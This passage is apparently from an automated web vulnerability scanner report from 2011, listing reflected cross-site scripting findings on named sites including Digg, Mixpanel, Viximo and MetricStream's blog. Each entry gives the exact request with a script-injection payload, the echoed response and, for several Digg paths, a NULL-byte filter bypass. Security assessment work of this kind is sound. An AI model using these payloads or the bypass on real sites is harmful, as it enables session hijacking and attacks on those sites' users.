Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:19:37 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 384
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.comd4501<script>alert(1)</script>6546b61c730 was not found on this server.</p>
...[SNIP]...

2.8. http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 862c4<script>alert(1)</script>f0820835d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com&862c4<script>alert(1)</script>f0820835d7e=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:19:38 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com&862c4<script>alert(1)</script>f0820835d7e=1 was not found on this server.</p>
...[SNIP]...

2.9. http://adonmax.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2267d<script>alert(1)</script>65805352abf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2267d<script>alert(1)</script>65805352abf HTTP/1.1
Host: adonmax.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:27:41 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 327
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico2267d<script>alert(1)</script>65805352abf was not found on this server.</p>
...[SNIP]...

2.10. http://api.mixpanel.com/track/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.mixpanel.com
Path:   /track/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f560e<script>alert(1)</script>a9d72cefb0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJtcF9wYWdlIjogImh0dHA6Ly93d3cuYmViby5jb20vIiwidG9rZW4iOiAiOTYxMTBkM2JmZGI3YmM3ZmYwYzNjM2U0MDhkMDIyMmIiLCJ0aW1lIjogMTMwOTk1MTMwNH19&ip=1&callback=mpmetrics.jsonp_callbackf560e<script>alert(1)</script>a9d72cefb0&_=1309951304288 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 06 Jul 2011 11:22:11 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Wed, 06 Jul 2011 11:22:10 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 68

mpmetrics.jsonp_callbackf560e<script>alert(1)</script>a9d72cefb0(1);

2.11. http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viximo.com
Path:   /api/v3/publishers/bebo.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f5abb<script>alert(1)</script>769dda3a9be was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v3/publishers/bebo.json?callback=viximo.publisherLoadedf5abb<script>alert(1)</script>769dda3a9be HTTP/1.1
Host: api.viximo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Wed, 06 Jul 2011 11:22:29 GMT
ETag: "71f99547f2ad6ad86b6f344aad90c979"
Server: nginx/0.7.65
Status: 200 OK
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.00955
Content-Length: 15840
Connection: keep-alive

viximo.publisherLoadedf5abb<script>alert(1)</script>769dda3a9be({body: {"publisher": {"uses_promo_bar": true, "profile_url": "http://www.bebo.com/Profile.jsp?MemberId={{user_id}}", "theme_enabled": true, "uses_gift_wrap": true, "uses_message_center": true, "offer_
...[SNIP]...

2.12. https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://blog.metricstream.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b953d'><script>alert(1)</script>19229b4da23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b953d\'><script>alert(1)</script>19229b4da23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b953d'><script>alert(1)</script>19229b4da23=1 HTTP/1.1
Host: blog.metricstream.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:404-BGD-511&token:_mch-metricstream.com-1309960802844-32266; __utma=216666762.365739093.1309960803.1309960803.1309960803.1; __utmc=216666762; __utmz=216666762.1309960803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216666762.9.10.1309960803

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32430

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>

<!-- feeds -->
<link rel="
...[SNIP]...
<a href='https://blog.metricstream.com/page/2/?b953d\'><script>alert(1)</script>19229b4da23=1' class="inactive">
...[SNIP]...

2.13. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload da4dd<script>alert(1)</script>e5b77016dd7 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FwwwG2EbeautyofthewebG2EcomG2FG3FfbidG3DNOFBIDG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1da4dd<script>alert(1)</script>e5b77016dd7&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Wed, 06 Jul 2011 15:39:15 GMT
Content-Type: application/javascript
Connection: close
Content-Length: 176
Etag: "169d3f95eedfc376e2b2695425fb43113203fccb"

meteor.json_query_callback({"url": "http://meme.ms/nh", "id": "1da4dd<script>alert(1)</script>e5b77016dd7", "persist": "http://meme.ms/persist?key=oqJAVXXYgcBXJagyM-pE0w"}, 0);

2.14. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload f6022<script>alert(1)</script>c416b9d548d was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FwwwG2EbeautyofthewebG2EcomG2FG3FfbidG3DNOFBIDG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Bf6022<script>alert(1)</script>c416b9d548d HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Wed, 06 Jul 2011 15:39:25 GMT
Content-Type: application/javascript
Connection: close
Content-Length: 176
Etag: "fb0e3943f6866607c9d82a370bb7c2e809b158e8"

meteor.json_query_callback({"url": "http://meme.ms/nh", "id": "1", "persist": "http://meme.ms/persist?key=oqJAVXXYgcBXJagyM-pE0w"}, 0);f6022<script>alert(1)</script>c416b9d548d

2.15. http://digg.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2cec"><script>alert(1)</script>5e1f327096a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a2cec"><script>alert(1)</script>5e1f327096a=1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=2ca757a04da66628966d82294dbe49583144ee4d69a172ca708f21056e34ef90; expires=Thu, 07-Jul-2011 11:37:18 GMT; path=/; domain=digg.com
X-Digg-Time: D=251801 10.2.128.190
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101254

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg - The Latest News Headlines, Videos and Images" href="/?a2cec"><script>alert(1)</script>5e1f327096a=1.rss">
...[SNIP]...

2.16. http://digg.com/ajax/submit/crawl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00186dc"><script>alert(1)</script>11a0bd260e7 was submitted in the REST URL parameter 1. This input was echoed as 186dc"><script>alert(1)</script>11a0bd260e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%00186dc"><script>alert(1)</script>11a0bd260e7/submit/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=408863 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18136

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax%00186dc"><script>alert(1)</script>11a0bd260e7/submit/crawl.rss">
...[SNIP]...

2.17. http://digg.com/ajax/submit/crawl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002ad4b"><script>alert(1)</script>2bf41c450a6 was submitted in the REST URL parameter 2. This input was echoed as 2ad4b"><script>alert(1)</script>2bf41c450a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submit%002ad4b"><script>alert(1)</script>2bf41c450a6/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=280116 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18137

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/submit%002ad4b"><script>alert(1)</script>2bf41c450a6/crawl.rss">
...[SNIP]...

2.18. http://digg.com/ajax/submit/crawl [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019fdd"><script>alert(1)</script>7a8b0f85e9c was submitted in the REST URL parameter 3. This input was echoed as 19fdd"><script>alert(1)</script>7a8b0f85e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submit/crawl%0019fdd"><script>alert(1)</script>7a8b0f85e9c HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=212072 10.2.128.108
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18123

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/submit/crawl%0019fdd"><script>alert(1)</script>7a8b0f85e9c.rss">
...[SNIP]...

2.19. http://digg.com/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d5183"><script>alert(1)</script>fbcd4c8b309 was submitted in the REST URL parameter 1. This input was echoed as d5183"><script>alert(1)</script>fbcd4c8b309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /login%00d5183"><script>alert(1)</script>fbcd4c8b309 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=217960 10.2.129.155
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18113

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/login%00d5183"><script>alert(1)</script>fbcd4c8b309.rss">
...[SNIP]...

2.20. http://digg.com/register [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c0388"><script>alert(1)</script>65b8dbc7903 was submitted in the REST URL parameter 1. This input was echoed as c0388"><script>alert(1)</script>65b8dbc7903 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /register%00c0388"><script>alert(1)</script>65b8dbc7903 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=275292 10.2.130.111
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18119

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/register%00c0388"><script>alert(1)</script>65b8dbc7903.rss">
...[SNIP]...

2.21. http://digg.com/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005a216"><script>alert(1)</script>04c84f7943d was submitted in the REST URL parameter 1. This input was echoed as 5a216"><script>alert(1)</script>04c84f7943d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search%005a216"><script>alert(1)</script>04c84f7943d HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=205025 10.2.129.90
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18107

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/search%005a216"><script>alert(1)</script>04c84f7943d.rss">
...[SNIP]...

2.22. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0034ebf"><script>alert(1)</script>07ed2e5f09b was submitted in the REST URL parameter 1. This input was echoed as 34ebf"><script>alert(1)</script>07ed2e5f09b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0034ebf"><script>alert(1)</script>07ed2e5f09b?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=281051 10.2.129.97
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18272

